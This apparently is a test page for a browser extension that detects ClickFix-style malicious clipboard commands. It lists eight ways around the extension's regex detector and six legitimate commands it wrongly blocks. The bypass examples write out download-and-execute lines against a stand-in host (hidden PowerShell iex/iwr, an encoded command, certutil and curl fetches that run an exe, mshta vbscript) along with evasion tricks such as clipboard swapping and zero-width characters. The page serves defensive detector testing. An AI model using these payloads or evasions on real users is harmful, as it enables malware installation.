Bypasses expected: contents is copied to clipboard and the extension does not block the page
1. navigator.clipboard.writeText() — no copy event
The detector only listens for
Note: this is what https://brew.sh/ uses to copy their install script to the clipboard, so by supporting navigator.clipboard.writeText() we might start falsely flagging sites like this.
copy/cut DOM events. The Clipboard API never fires one, so the regex is never consulted.Note: this is what https://brew.sh/ uses to copy their install script to the clipboard, so by supporting navigator.clipboard.writeText() we might start falsely flagging sites like this.
powershell -w hidden -c iex(iwr https://example.com/p.ps1)
2. clipboardData.setData override
Page installs its own
copy listener that swaps the clipboard payload while the selection stays benign. Detector regex is run against the benign selection, not event.clipboardData.I'm not a robot — verification code A1B2-C3D4
Payload that ends up on clipboard
powershell -w hidden -c iex(iwr https://example.com/p.ps1)
3. Anchor bypass — any non-whitespace prefix breaks ^\s*
The regex is anchored at the start of the string with only optional whitespace allowed before the command name. Any other prefix — a quote, a full executable path, a shell sigil — defeats the match. Two common variants below.
"powershell" -w hidden -c iex(iwr https://example.com/p.ps1)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex(iwr https://example.com/p.ps1)
4. Argument whitelist too narrow
After the command name the regex requires one of
-w | -c | -o | /c | https?://. Any other flag or sub-command bypasses the match — including standard PowerShell options (-NoProfile, -ExecutionPolicy, -EncodedCommand) and cmd /k, which keeps the shell open instead of /c.powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQA=
cmd /k curl -o %TEMP%\p.exe https://example.com/p.exe && %TEMP%\p.exe
5. Zero-width separator between command and flag
\s in JS regex does not match U+200B (zero-width space). The Run dialog / shell still parses it as whitespace on most setups, or the user's pasting tooling normalises it.powershell-c iex(iwr https://example.com/p.ps1)
6. Unlisted binaries — pwsh, certutil, mshta vbscript:
PowerShell 7+ uses
pwsh; LOLBins like certutil, bitsadmin, regsvr32, rundll32, wscript aren't listed. mshta with a vbscript: URL also misses (no http prefix).pwsh -c iex(iwr https://example.com/p.ps1)
certutil -urlcache -split -f https://example.com/p.exe %TEMP%\p.exe
mshta vbscript:CreateObject("WScript.Shell").Run("notepad")(window.close)
7. <iframe srcdoc> — content script not injected
Manifest sets
match_about_blank: false, and *://*/* doesn't cover about:srcdoc. Code inside the iframe runs with no detector present.8. Split-payload — chunks individually below the regex
ClickFix instructions often have the user copy the payload in pieces ("press Win+R, paste this, then this…"). No individual chunk matches.
powershell
-w hidden -c "iex(iwr https://example.com/p.ps1)"
False positives expected: legitimate copy is prevented and the page is blocked
F1. Homebrew install (brew.sh, copy-pasted verbatim)
Matches
Note: brew.sh doesn't use the copy method used by this copy button. brew.sh uses navigator.clipboard.writeText() which is not detected by the extension. (See bypass 1)
/bin/bash -c.Note: brew.sh doesn't use the copy method used by this copy button. brew.sh uses navigator.clipboard.writeText() which is not detected by the extension. (See bypass 1)
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
F2. Common curl https://… snippet
Matches
Example in the wild: copy the
curl https?://. Stack Overflow, GitHub READMEs, AWS/GCP/Azure docs and LLM chat UIs all routinely emit lines like these — copying any of them is blocked.Example in the wild: copy the
curl https://[my domain or IP address] snippet from the top answer at https://stackoverflow.com/questions/10079707/https-connection-using-curl-from-command-line (skip the leading cmd> prompt).curl https://api.github.com/repos/anthropics/claude-code
curl https://api.openai.com/v1/models -H "Authorization: Bearer $TOKEN"
F3. curl -o release download
Matches
Example: matches the third copy code box here: https://everything.curl.dev/cmdline/options/short.html
Example: highlight and copy the curl -o command here: https://medium.com/@punya8147_26846/aws-cli-essentials-setup-across-mac-windows-and-linux-6246d017a8ac
curl -o.Example: matches the third copy code box here: https://everything.curl.dev/cmdline/options/short.html
Example: highlight and copy the curl -o command here: https://medium.com/@punya8147_26846/aws-cli-essentials-setup-across-mac-windows-and-linux-6246d017a8ac
curl -o kubectl https://dl.k8s.io/release/v1.30.0/bin/linux/amd64/kubectl
F4. Microsoft Learn — powershell -c example
Matches
powershell -c. The argument is a benign cmdlet.powershell -c "Get-Service -Name Spooler"
F5. Windows IT support snippet — cmd /c
Matches
cmd /c. Common in helpdesk articles.cmd /c ipconfig /flushdns
F6. mshta https://…
Matches
mshta https?://. Legit (if rare) admin usage exists.mshta https://internal.intranet.example.com/dashboard.hta